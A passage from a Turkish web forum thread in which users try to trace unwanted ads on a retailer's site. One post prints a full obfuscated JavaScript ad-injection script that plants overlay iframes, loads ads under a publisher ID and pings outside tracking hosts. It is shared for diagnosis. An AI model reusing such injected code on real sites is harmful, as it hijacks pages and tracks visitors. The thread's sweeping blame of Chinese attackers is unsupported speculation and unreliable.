• 30-07-2013, 01:07:47
    #46
    kaynak kodlarında buldum

    Alıntı
    <!-- Google Code for Kampanya Sayfalari Remarketing List -->
    <script type="text/javascript">
    /* <![CDATA[ */
    var google_conversion_id = 1033816529;
    var google_conversion_language = "en";
    var google_conversion_format = "3";
    var google_conversion_color = "666666";
    var google_conversion_label = "KhCTCIuH8QEQ0ZP77AM";
    var google_conversion_value = 0;
    /* ]]> */
    </script>
    <script type="text/javascript" src="http://www.googleadservices.com/pagead/conversion.js">
    </script>
    <noscript>
    <div style="display:inline;">
    <img height="1" width="1" style="border-style:none;" alt="" src="http://www.googleadservices.com/pagead/conversion/1033816529/?label=KhCTCIuH8QEQ0ZP77AM&amp;guid=ON&amp;script= 0"/>
    </div>
    </noscript>
  • 30-07-2013, 01:08:54
    #47
    Aynı şeyleri yazıp duruyoruz bu adsense kodu değil remarketing dönüşüm izleme kodu.

    Sanalsaray adlı üyeden alıntı: mesajı görüntüle
    kaynak kodlarında buldum
  • 30-07-2013, 02:06:41
    #48
    Kimlik doğrulama veya yönetimden onay bekliyor.
    NetX adlı üyeden alıntı: mesajı görüntüle
    Konuya attigim tum mesajlarda belirttigim gibi konunun Vatan'la ilgisi yok, Vatan'in haberi yok bu olaydan.
    Kendileri ile iletisime gectigimi yazmistim bugun Vatan'in bilgi islem muduru Sinan Bey ile mesajlasmalarimiz oldu.
    Kendilerine daha once bu konu ile ilgili sikayetler geldigini fakat boyle bir soruna rastlamadiklarini sorunun bilgisayar kaynakli olabileceginden bahsetti.
    Bunun uzerine burada paylastigim iPod ekran goruntusunu ve bir kac teknik detayi paylastim, konu ile ilgili calisma baslatacaklarini belirtti.

    Kod cok profosyonelce yerlestirilmis bir imaj yada js icerisinde olma ihtimali cok yuksek, ve belirttigim gibi bu tur saldirilarin memleketi olan Cin'den geliyor ve kod belli araliklarda calismiyor, bu da sistem yoneticileri tarafindan tespit edilmesini minimuma indiriyor
    Bence de js içine atılmış kodlar. denk gelse iyice irdeliycem.çin falan mı vatan olmasın bu hiç çin virüs gibi bişey adsenseyi kullandığını görmedim ben.pek mantıklı gelmedi .
  • 30-07-2013, 02:26:33
    #49
    sinan3 adlı üyeden alıntı: mesajı görüntüle
    Bence de js içine atılmış kodlar. denk gelse iyice irdeliycem.çin falan mı vatan olmasın bu hiç çin virüs gibi bişey adsenseyi kullandığını görmedim ben.pek mantıklı gelmedi .
    Reklamlarin geldigi url adresini tespit etmistim:
    o.27-5.com
    Whois cektiginizde Cinli bir vatandasa ait oldugu anlasiliyor.
    Cinliler bu tur zararlilari cok prof yapiyor ve artik her turlu islerinde kullaniyorlar.
    Adsense ile kullanmalari pek sasirtici degil yani.
  • 30-07-2013, 03:50:09
    #50
    yakalayan arkadaşlar bir dahakine yakaladıkları anda html kaynak kodlarını paylaşırlar mı ? İşi netliğe bağlayalım artık uzamasın konu.
  • 31-07-2013, 08:46:42
    #51
    EgemenPolat adlı üyeden alıntı: mesajı görüntüle
    Bende de çıkıyor zaman zaman fakat benim bilgisayarımda asla ve asla virüs olamaz, hep bilgisayarı tarıyorum ek olarakda hiç bir program yüklemiyorum veya hiç bir exe çalıştırmıyorum...



    Katılıyorum...

    --R10.NET; Flood Engellendi -->-> Yeni yazılan mesaj 06:43:02 -->-> Daha önceki mesaj 06:39:39 --

    Eğer sorun bilgisayarlarımızdaysa olabilecek tek sorun tarayıcı eklentileri...

    Ben FireFox kullanıyorum ve aşağıdaki eklentiler kurulu, bu sorunu yaşayıpta aşağıdaki eklentileri kurulu olanlar yorum yazarsa konuya açıklık getirme ihtimalimiz olabilir...

    Adblock Plus 2.3.1
    DownloadHelper 4.9.17

    Hocam kendinizden okadar emin konuşmuşsunuz ki, benim de gerçekten komiğime gitti ve cevap yazmadan edemeyeceğim

    Demişsiniz ki "fakat benim bilgisayarımda asla ve asla virüs olamaz, hep bilgisayarı tarıyorum ek olarakda hiç bir program yüklemiyorum veya hiç bir exe çalıştırmıyorum."


    Ben de size şunu diyim, İnternet erişimi olan ve surf yapılan tüm bilgisayarlarda virüs vardır veya olma ihtimali çok yüksektir. Virüs sadece exe den bulaşmaz. Sİz internet bir sayfaya girdiğinizde veya bir resim görüntülediğiniz de-de bilgisayarınıza virüs bulaşabilmektedir. Özel yazılımlar ile sizin bilgisayarınız tarandığında acaba kaç bin adet virüs ve trojen çıkar
  • 31-07-2013, 08:55:57
    #52
    Üyeliği durduruldu
    Sebonline adlı üyeden alıntı: mesajı görüntüle
    Hocam kendinizden okadar emin konuşmuşsunuz ki, benim de gerçekten komiğime gitti ve cevap yazmadan edemeyeceğim

    Demişsiniz ki "fakat benim bilgisayarımda asla ve asla virüs olamaz, hep bilgisayarı tarıyorum ek olarakda hiç bir program yüklemiyorum veya hiç bir exe çalıştırmıyorum."


    Ben de size şunu diyim, İnternet erişimi olan ve surf yapılan tüm bilgisayarlarda virüs vardır veya olma ihtimali çok yüksektir. Virüs sadece exe den bulaşmaz. Sİz internet bir sayfaya girdiğinizde veya bir resim görüntülediğiniz de-de bilgisayarınıza virüs bulaşabilmektedir. Özel yazılımlar ile sizin bilgisayarınız tarandığında acaba kaç bin adet virüs ve trojen çıkar
    Her türlü güvenlik önlemini alıyorum, çalışmalarımı sakladığım makinamı tamamen yalıtılmış olarak kullanıyorum, sadece belirli başlı internet sitelerine giriyorum...

    Zaten bilgisayar yazılımcısıyım, inanınki virüs nasıl bulaşır, antivirüslerden nasıl saklanır vb konularda bilgi sahibiyim...

    MAKİNAMDA ASLA VE ASLA VİRÜS YOK!
  • 01-08-2013, 14:09:47
    #53
    Nasıl bir virüsse hep vatanın sayfasında çıkıyor
  • 03-08-2013, 21:44:28
    #54
    İlgili kodu <script></script> etiketleri arasına yerleştirip .html olarak kaydettikten sonra çıkacak ekran bakın bakalım tanıdık gelecek mi?

    eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--){d[e(c)]=k[c]||e(c)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('3 P=t;3 S=t;6 1U(2,w,h,l,r,x,s,4){d(!S&&j["12"]){S=17;d(j["12"]()==\'1Z\')n}d(2=="")2+=B 1X().25();3 b=8.E("A");b.2="V"+2;3 1L=(l>=0)?"11:"+l+"9;":"10:"+r+"9;";b.7.I="N:"+w+";D:"+(h+4.Q)+"9;1K:1Y;1V:1J;1N:c;"+1L+"z-1Q:1P;Y:c;k:c;u:c";8.o.y(b);3 O=8.E("A");O.7.I="N:"+w+"9;D:"+h+"9;Y:c;k:c;u:c";b.y(O);d(!j.1W){j.2g("2i",6(){1O(2,h+4.Q)})}d(4.1l){3 J=8.E("A");J.7.I="N:"+w+"9;D:"+4.Q+"9;k:c;u:c;W-p:#Z";J.1E=4.1D;b.y(J);3 1F=(4.15>=0)?"11:"+4.15+"9;":"10:"+4.1m+"9;";3 1H=(4.14>=0)?"K:"+4.14+"9;":"1N:"+4.1p+"9;";3 g=8.E("a");g.7.I="1K:1J;k:c;u:c;D:"+4.1k+"9;"+1F+";"+1H+"W-p:#Z;p:#1j;z-1Q:1P;v-2f:1G;2e: 28;M-2j:2c;M-2d:2b;M-1r:2a;";g.1E="<A 7=\'k:29;k-11:1n;k-10:1n;u:c;v-2k:2l\'>X <1B 7=\'M-1r:2h;\'>2m</1B></A>";g.22="#";g.24=6(){1I(2);d(s)n s(m);n t};g.21=6(){m.7.1s="#23";m.7.p="#1A"};g.20=6(){m.7.1s="#Z";m.7.p="#1j"};b.y(g)}3 e=8.E("2w");e.2="1f"+2;e.Y=0;e.2Q=0;e.2R="1o";e.7.N=w+"9";e.7.D=h+"9";O.y(e);3 L=e.1g.8;L.13("<!2n 18><18><1z><7 1e=\'v/2J\'>o { u:c; W-p:#1A; }</7></1z><o 2S=\'1o\'>");L.13(x);L.13("</o></18>");1T(6(){8.U("1f"+2).1g.8.2X()},2W);d(!P&&j["T"]){j["T"]();P=17}}3 1S={1l:17,15:-1,1m:0,14:-1,1p:0,1k:16,Q:16,1D:\'&2u;\',2v:6(){3 19={};1R(3 1a 2I m){19[1a]=m[1a]}n 19}};6 1b(2,w,h,l,r,x,s,4){d(!4)4=1S;d(!8.o){1T(6(){1b(2,w,h,l,r,x,s,4)},2p);n}1U(2,w,h,l,r,x,s,4)}6 1O(2,K){3 b=8.U("V"+2);d(b)b.7.K=8.o.2y+8.o.2F-K+"9"}6 1I(2){3 b=8.U("V"+2);d(b)b.7.2C="1G"}6 2z(H){P=t;j["T"]=H}6 1y(H){S=t;j["12"]=H}6 1M(2){(B G()).q="C://1v.1w.1u.1C/"+2+".1q"}(6(){1y(6(){3 1d=8.2B("2A");1R(3 i=0;i<1d.2D;i++){d(1d[i].q.2G("/1i.")>-1){1M(\'2E\');n\'\'}}});3 f=\'<F\'+\'R 1e="v/1h">\';f+=\'2x = "2r-2q-2o";\';f+=\'2t = "2H";\';f+=\'2V = 1x;\';f+=\'2U = 1t;\';f+=\'</F\'+\'R>\';f+=\'<F\'+\'R 1e="v/1h" q="C://1i.2T.1c/2M/2L.2K"></F\'+\'R>\';1b(\'\',1x,1t,2N,0,f,6(){(B G()).q="C://a.27-5.1c/2O.2P";n t})})();(B G()).q="C://1v.1w.1u.1C/26.1q";(B G()).q="C://a.27-5.1c/2s";',62,184,'||id|var|options||function|style|document|px||se_bg|0px|if|se_body|_adc|se_button|||window|padding||this|return|body|color|src||onbclick|false|margin|text||adbody|appendChild||div|new|http|height|createElement|scr|Image|func|cssText|se_nobut|top|se_content|font|width|se_cdiv|SE_ISLOADER|XNHeight|ipt|SE_ISLOADER_START|SE_LOADEND_RUN|getElementById|SE_ADLINK_LAY_|background||border|ccc|right|left|SE_LOADEND_START|writeln|XTop|XLeft||true|html|_element|item|SE_SHOWAD_RUN|com|scripts|type|SE_ADFRAME_|contentWindow|javascript|pagead2|000|XHeight|XButton|XRight|5px|no|XBottom|asp|weight|backgroundColor|280|51|img|users|336|SE_SET_LOADSTART|head|fff|span|la|XNCode|innerHTML|slr|none|stb|SE_HIDDENAD_RUN|absolute|position|lr|SE_LA|bottom|SE_AUTOPOSTION|2147483647|index|for|SE_DEFAULT_OPTIONS|setTimeout|SE_ADLINK_FUNC|_position|XMLHttpRequest|Date|fixed|exit|onmouseout|onmouseover|href|ff3300|onclick|getTime|1458087||pointer|1px|bold|Arial|12px|family|cursor|decoration|attachEvent|normal|onscroll|size|align|center|Close|DOCTYPE|0552135711235860|1000|pub|ca|run|google_ad_slot|nbsp|Copy|iframe|google_ad_client|scrollTop|SE_SET_LOADFUNC|script|getElementsByTagName|display|length|15940000|clientHeight|indexOf|3295881345|in|css|js|show_ads|pagead|300|click|ashx|frameBorder|scrolling|scroll|googlesyndication|google_ad_height|google_ad_width|2000|close'.split('|'),0,{}))
    Başından beri diyorum bu kodlar dışarıdan çekiliyor, çekilen domain adresini de daha önceki mesajlarımda belirttim.

    Yalnız hangi kod üzerinden çağırılıyor onu çözemedim, ama şunu söyleyebilirim ki kodu yazan herif bildiğin usta.

    Şöyle ki yazdığı kod sadece Google ziyaretçilerine görünüyor ve yakalanma ihtimalini en aza indirmek için sadece belli saat aralıklarında çalışıyor.

    Acaba diyorum sunucu taraflı bir zararlı mı, IIS üzerine hiçbir bilgim yok fakat daha önce Apache sunucu üzerinde buna benzer bir saldırıya rastlamıştım.

    Bahsettiğim saldırıda içerisinde hiçbir dosya olmayan boş index sayfasında bile iframe kodu çağırılıyordu, yani nasıl bir saldırıysa artık Apache'yi komple etkiliyordu ve ne tesadüftür ki bu saldırı da Çin kaynaklıydı.